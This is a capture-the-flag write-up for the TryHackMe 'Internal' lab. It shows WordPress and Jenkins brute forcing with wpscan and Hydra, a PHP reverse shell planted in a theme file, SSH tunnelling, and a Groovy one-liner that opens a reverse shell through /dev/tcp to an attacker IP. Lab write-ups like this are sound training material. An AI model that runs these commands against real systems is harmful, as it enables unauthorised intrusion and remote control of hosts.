tryhackme Internal write-up
- Name: Internal
- Description: Penetration Testing Challenge
- Room: tryhackme.com
- Difficulty: Hard
Services enumeration
Let’s use Nmap to enumerate the services. We discover two ports:
command : nmap -sC -sV <Machine-IP>
Web enumeration
We scan directories with gobuster
In the hosts file, add http: //internal.thm
command: vi /etc/hosts
<Machine-IP> http://internal.thm
Next
command: gobuster dir -u http://internal.thm -w /usr/share/wordlists/dirb/common.txt
Wordpress enumeration
We can confirm our assumption that this is a Wordpress blog by browsing /blog. Let’s enumerate the users using wpscan:
command: wpscan — url http://internal.thm/blog -e u
WPScan indicates that the only user is admin. Using WPScan’s bruteforce feature, let’s try bruteforcing the password:
command: wpscan — url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt
After a few minutes we find the password…
With admin:my2boys, we are able to log in (http://internal.thm/blog/wp-admin/) and modify the templates PHP source code. It will be convenient to write a reverse shell this way.
Navigate to “Appearance > Theme Editor > 404.php” and replace the PHP reverse shell (http://pentestmonkey.net/tools/web-shells/php-reverse-shell).
Create a listener using nc
command: nc -nlvp 4321
The reverse shell file should contain your IP and port
After uploading, call the template (http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php).
A file in the /opt directory is of interest:
Let’s login with the user aubreanna
command: ssh aubreanna@<Machine-IP>
User flag
The user flag is in aubreanna home folder
Root Flag
Check privileges…
We will need privilege escalation to read the root flag. Aubreanna is not on the sudoers list.
A file in aubreanna’s home folder tells us Jenkins runs on port 8080:
As you can see, there’s a docker running on target machine with 172 series IP address, so Jenkins is inside docker running on port 8080. Even if we try to access that docker IP and Port using our browser it’s not reachable. So, to access it we are going to use SSH tunneling technique to forward Jenkins ip:port to our attacker machine’s ip:port.
command: ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm
Jenkins can be accessed by typing localhost:8080 into your browser.
Jenkins requires credentials to be accessed. Even the regular passwords, such as admin:admin or admin:password, won’t work. A brute-force attack must be used, such as Hydra.
To do that, intercept the POST request in BurpSuite to build our hydra attack.
When information is incorrect, we receive this message: “Invalid username or password”
We now have all the required information. Here is the hydra attack:
Then enter the following command in hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt internal.thm -s 8080 http-post-form “/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password”
After a few minutes, we encounter the following message
[8080][http-post-form] host: internal.thm login: admin password: spongebob
Now that we have an admin access to Jenkins, we can run commands, and we’ll ultimately exploit this to have a reverse shell.
Reverse shell in docker
Run a listener (on your machine):
command: nc -nlvp 1234
Click the “Script Console” menu item in Jenkins by going to “Jenkins > Nodes > master”.
Run the following command:
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/<Your-IP>/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()
And when we run…
another method
Use “Shellkins”
- Clone this repository
$ git clone https://github.com/xiosec/Shellkins.git
- Run a listener (on your machine)
$ nc -nlvp 1234
Run the script
$ python3 shellkins.py --host http://example.com:8080/ --user admin --pass admin --lhost 127.0.0.1 --lport 1234
Root password
Back to our initial SSH connection as aubreanna
To get the root flag
thank you 🌏🔥